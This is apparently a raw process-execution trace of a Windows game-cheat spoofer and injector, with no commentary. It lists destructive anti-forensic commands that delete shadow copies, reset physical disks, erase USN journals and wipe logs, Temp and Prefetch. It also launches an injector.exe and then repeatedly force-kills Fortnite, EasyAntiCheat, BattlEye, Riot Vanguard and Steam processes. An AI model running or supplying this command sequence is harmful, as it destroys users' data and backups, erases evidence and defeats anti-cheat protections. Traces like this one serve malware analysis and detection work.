C:\Windows\system32\net.exe
net stop winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop winmgmt /y
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net start winmgmt /y >nul
C:\Windows\system32\net.exe
net start winmgmt /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start winmgmt /y
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns >nul
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh int reset all >nul
C:\Windows\system32\netsh.exe
netsh int reset all
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh int ipv4 reset >nul
C:\Windows\system32\netsh.exe
netsh int ipv4 reset
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh int ipv6 reset >nul
C:\Windows\system32\netsh.exe
netsh int ipv6 reset
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh winsock reset >nul
C:\Windows\system32\netsh.exe
netsh winsock reset
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell vssadmin delete shadows /all >nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell vssadmin delete shadows /all
C:\Windows\system32\vssadmin.exe
"C:\Windows\system32\vssadmin.exe" delete shadows /all
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Reset-PhysicalDisk * >nul
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Reset-PhysicalDisk *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n C: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n C:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n D: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n D:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n E: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n E:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c fsutil usn deletejournal /n F: >nul
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /n F:
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\System32\restore\MachineGuid.txt >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\IndexerVolumeGuid >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\System Volume Information\tracking.log >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.dev.log >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q C:\Windows\INF\setupapi.setup.log >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Default\AppData\Roaming\injector.exe
C:\Users\Default\AppData\Roaming\injector.exe
C:\Users\Default\AppData\Roaming\injector.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM EpicGamesLauncher.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_BE.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM vgtray.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C taskkill/F /T /IM SteamService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM FortniteClient-Win64-Shipping_EAC.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM RiotClientServices.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM vgtray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /T /IM SteamService.exe
C:\Windows\System32\cmd.exe
